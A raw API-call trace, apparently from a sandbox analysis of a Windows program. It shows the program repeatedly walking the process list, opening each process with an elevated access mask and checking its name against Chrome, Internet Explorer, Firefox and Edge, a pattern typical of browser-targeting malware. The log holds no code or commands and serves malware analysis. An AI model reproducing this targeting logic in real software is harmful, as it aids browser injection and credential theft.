	[0252.761] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.762] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa720
	[0252.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.762] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.763] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.763] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.763] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa724
	[0252.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.765] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.766] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.766] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.766] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.766] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa728
	[0252.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.768] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.768] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.768] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.769] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.769] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0252.769] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa72c
	[0252.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.770] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0252.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.770] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.770] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0252.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.771] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.771] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.772] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa730
	[0252.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.772] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.772] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.773] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.773] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.773] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa734
	[0252.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.774] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.774] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.775] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.775] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.775] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0252.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa738
	[0252.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.781] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0252.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.781] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.782] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0252.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.782] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.782] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0252.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa73c
	[0252.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.783] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.784] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.784] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.784] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.785] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0252.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa740
	[0252.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.786] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0252.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.786] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.786] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0252.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.786] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.787] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa744
	[0252.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.787] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.788] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.788] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.788] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.789] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0252.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa748
	[0252.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.790] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0252.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.790] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.790] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0252.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.791] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.791] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0252.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa74c
	[0252.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.792] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.792] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.793] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.793] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.793] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0252.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa750
	[0252.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.794] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0252.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.795] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.795] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0252.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.795] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.795] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0252.796] CloseHandle (hObject=0x4fd0) returned 1
	[0252.796] Sleep (dwMilliseconds=0x64) 
	[0252.893] GetCurrentProcessId () returned 0x110
	[0252.893] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0252.899] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0252.901] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0252.902] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0252.903] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa754
	[0252.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.903] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.903] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.903] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.904] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.904] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0252.905] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa758
	[0252.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.905] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.905] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.906] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.906] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.906] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0252.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa75c
	[0252.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.907] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0252.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.908] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.908] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0252.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.908] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.909] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0252.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa760
	[0252.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.910] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.910] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.910] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.911] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.911] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0252.912] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa764
	[0252.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.912] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0252.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.912] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.913] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0252.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.913] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.913] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0252.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa768
	[0252.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.914] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0252.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.914] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.915] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0252.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.915] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.915] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0252.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa76c
	[0252.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.916] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0252.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.917] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.917] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0252.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.917] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.917] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0252.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa770
	[0252.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.918] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0252.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.918] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.919] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0252.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.919] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.919] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.920] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa774
	[0252.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.920] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.920] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.921] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.921] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.921] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa778
	[0252.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.922] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.922] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.923] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.923] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa77c
	[0252.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.924] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.925] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
